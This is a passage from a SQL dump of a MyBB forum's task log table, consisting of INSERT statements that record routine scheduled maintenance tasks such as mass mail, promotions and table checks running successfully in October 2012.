VALUES('12749', '5', '1351186591', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12750', '9', '1351186605', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12751', '3', '1351186681', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12752', '9', '1351186903', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12753', '5', '1351188608', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12754', '9', '1351188674', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12755', '3', '1351188690', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12756', '1', '1351189403', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12757', '7', '1351189925', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12758', '5', '1351189935', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12759', '9', '1351189990', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12760', '3', '1351189993', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12761', '9', '1351191161', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12762', '5', '1351191171', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12763', '9', '1351192054', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12764', '3', '1351192058', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12765', '1', '1351192064', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12766', '7', '1351192072', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12767', '5', '1351192081', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12768', '9', '1351192749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12769', '5', '1351193126', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12770', '9', '1351193134', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12771', '3', '1351193435', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12772', '9', '1351194196', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12773', '5', '1351194533', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12774', '9', '1351195151', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12775', '3', '1351195185', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12776', '1', '1351196199', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12777', '7', '1351196204', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12778', '5', '1351196216', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12779', '9', '1351196232', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12780', '5', '1351196716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12781', '9', '1351196875', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12782', '3', '1351197146', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12783', '9', '1351197711', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12784', '5', '1351198037', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12785', '9', '1351198903', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12786', '3', '1351198942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12787', '1', '1351198944', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12788', '7', '1351198951', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12789', '5', '1351199504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12790', '9', '1351199993', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12791', '5', '1351201273', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12792', '9', '1351201311', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12793', '3', '1351201317', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12794', '5', '1351201527', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12795', '9', '1351202115', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12796', '3', '1351202355', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12797', '1', '1351202425', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12798', '7', '1351202451', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12799', '5', '1351203070', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12800', '9', '1351203382', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12801', '5', '1351204109', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12802', '9', '1351204973', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12803', '3', '1351205018', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12804', '5', '1351205710', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12805', '9', '1351205717', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12806', '3', '1351206638', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12807', '1', '1351206656', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12808', '7', '1351206674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12809', '5', '1351206692', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12810', '9', '1351206724', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12811', '5', '1351207501', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12812', '9', '1351207621', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12813', '3', '1351208596', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12814', '9', '1351208645', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12815', '5', '1351209015', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12816', '9', '1351210024', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12817', '3', '1351210041', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12818', '1', '1351210430', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12819', '2', '1351210582', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12820', '7', '1351210795', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12821', '11', '1351210818', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12822', '5', '1351211360', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12823', '9', '1351211643', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12824', '3', '1351211646', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12825', '9', '1351212298', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12826', '5', '1351212302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12827', '9', '1351212929', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12828', '3', '1351213219', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12829', '1', '1351213221', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12830', '7', '1351213223', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12831', '5', '1351213662', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12832', '9', '1351213833', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12833', '5', '1351214848', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12834', '9', '1351214863', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12835', '3', '1351215003', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12836', '9', '1351215604', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12837', '5', '1351215931', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12838', '9', '1351216547', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12839', '3', '1351216753', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12840', '1', '1351216911', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12841', '7', '1351216922', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12842', '5', '1351217107', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12843', '9', '1351217436', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12844', '5', '1351218310', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12845', '9', '1351218336', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12846', '3', '1351218618', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12847', '9', '1351220336', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12848', '5', '1351221304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12849', '3', '1351223669', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12850', '1', '1351224091', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12851', '7', '1351224098', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12852', '9', '1351224978', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12853', '5', '1351225014', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12854', '3', '1351225038', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12855', '5', '1351225588', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12856', '9', '1351228456', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12857', '3', '1351228613', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12858', '5', '1351228631', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12859', '1', '1351228647', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12860', '7', '1351228674', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12861', '5', '1351229393', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12862', '9', '1351229432', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12863', '3', '1351230688', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12864', '9', '1351233733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12865', '5', '1351233742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12866', '3', '1351233811', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12867', '1', '1351235245', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12868', '7', '1351235266', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12869', '5', '1351235846', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12870', '9', '1351235912', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12871', '3', '1351235928', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12872', '5', '1351236341', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12873', '9', '1351236420', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12874', '3', '1351236729', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12875', '9', '1351237463', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12876', '5', '1351237559', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12877', '9', '1351238216', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12878', '3', '1351238360', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12879', '1', '1351238426', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12880', '7', '1351238468', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12881', '5', '1351238754', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12882', '9', '1351239170', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12883', '5', '1351239980', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12884', '9', '1351240679', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12885', '3', '1351241053', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12886', '9', '1351241188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12887', '5', '1351241212', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12888', '9', '1351241756', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12889', '3', '1351242804', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12890', '1', '1351243804', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12891', '7', '1351243820', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12892', '5', '1351244088', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12893', '9', '1351246471', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12894', '3', '1351246806', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12895', '5', '1351246837', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12896', '1', '1351246864', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12897', '7', '1351247168', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12898', '5', '1351247568', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12899', '9', '1351247580', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12900', '3', '1351247775', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12901', '9', '1351248207', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12902', '5', '1351248386', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12903', '9', '1351249162', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12904', '3', '1351249201', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12905', '1', '1351249387', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12906', '7', '1351249418', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12907', '5', '1351249796', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12908', '9', '1351250471', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12909', '5', '1351250719', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12910', '9', '1351250769', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12911', '3', '1351251179', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12912', '9', '1351252407', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12913', '5', '1351252413', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12914', '9', '1351252548', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12915', '3', '1351252810', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12916', '1', '1351252989', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12917', '4', '1351252999', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12918', '7', '1351253113', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12919', '5', '1351253124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12920', '9', '1351253488', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12921', '5', '1351254302', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12922', '9', '1351254352', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12923', '3', '1351254726', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12924', '9', '1351255369', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12925', '5', '1351255520', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12926', '9', '1351256385', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12927', '3', '1351256386', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12928', '1', '1351256408', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12929', '7', '1351256408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12930', '5', '1351256713', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12931', '9', '1351260415', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12932', '5', '1351260435', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12933', '3', '1351260457', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12934', '1', '1351260461', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12935', '7', '1351260495', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12936', '9', '1351260603', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12937', '5', '1351261999', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12938', '9', '1351262400', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12939', '3', '1351262665', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12940', '5', '1351264152', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12941', '9', '1351264159', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12942', '3', '1351264162', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12943', '1', '1351264168', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12944', '7', '1351265139', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12945', '9', '1351265227', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12946', '5', '1351265260', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12947', '3', '1351265415', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12948', '9', '1351266824', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12949', '5', '1351266875', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12950', '9', '1351266980', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12951', '3', '1351267244', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12952', '1', '1351267255', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12953', '7', '1351267400', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12954', '5', '1351269577', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12955', '9', '1351269643', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12956', '3', '1351269694', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12957', '5', '1351270073', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12958', '9', '1351271348', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12959', '3', '1351271380', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12960', '1', '1351271978', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12961', '7', '1351271985', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12962', '5', '1351272023', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12963', '9', '1351272040', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12964', '5', '1351273661', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12965', '9', '1351273685', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12966', '3', '1351273719', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12967', '9', '1351275183', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12968', '3', '1351275214', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12969', '1', '1351275250', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12970', '7', '1351275274', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12971', '5', '1351275704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12972', '5', '1351276114', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12973', '9', '1351276122', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12974', '3', '1351276359', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12975', '9', '1351278934', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12976', '5', '1351278936', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12977', '3', '1351278942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12978', '1', '1351278953', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12979', '7', '1351278955', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12980', '5', '1351280084', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12981', '9', '1351280119', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12982', '3', '1351280144', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12983', '9', '1351280817', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12984', '5', '1351280850', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12985', '9', '1351281872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12986', '3', '1351281878', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12987', '1', '1351281975', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12988', '7', '1351281983', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12989', '5', '1351282032', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12990', '9', '1351282343', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12991', '5', '1351284567', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12992', '9', '1351284648', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12993', '3', '1351285410', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12994', '9', '1351286284', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12995', '1', '1351286536', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12996', '7', '1351286541', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('12997', '5', '1351286552', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12998', '5', '1351286956', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('12999', '9', '1351287016', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13000', '3', '1351287027', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13001', '9', '1351288587', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13002', '5', '1351288591', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13003', '3', '1351292714', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13004', '1', '1351292739', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13005', '7', '1351292751', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13006', '5', '1351292770', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13007', '9', '1351293352', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13008', '5', '1351294126', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13009', '9', '1351294206', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13010', '3', '1351294251', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13011', '9', '1351299628', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13012', '5', '1351302744', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13013', '3', '1351302761', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13014', '1', '1351302766', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13015', '2', '1351303286', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13016', '7', '1351303296', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13017', '11', '1351303298', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13018', '9', '1351303423', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13019', '3', '1351303454', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13020', '1', '1351303470', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13021', '5', '1351303524', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13022', '9', '1351303961', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13023', '5', '1351305133', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13024', '9', '1351305155', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13025', '3', '1351305198', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13026', '9', '1351305619', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13027', '5', '1351305910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13028', '9', '1351306526', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13029', '3', '1351306869', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13030', '1', '1351306894', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13031', '7', '1351306988', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13032', '5', '1351307165', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13033', '9', '1351307491', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13034', '5', '1351308386', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13035', '9', '1351308439', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13036', '3', '1351308786', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13037', '9', '1351309235', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13038', '5', '1351310795', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13039', '9', '1351310821', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13040', '3', '1351310843', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13041', '1', '1351310848', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13042', '7', '1351310853', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13043', '9', '1351313165', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13044', '5', '1351313172', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13045', '3', '1351313224', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13046', '9', '1351314363', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13047', '3', '1351314372', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13048', '1', '1351314385', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13049', '7', '1351314536', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('13050', '5', '1351314544', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13051', '9', '1351314832', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13052', '5', '1351316058', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13053', '9', '1351316094', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('13054', '3', '1351316101', 'The user cleanup task 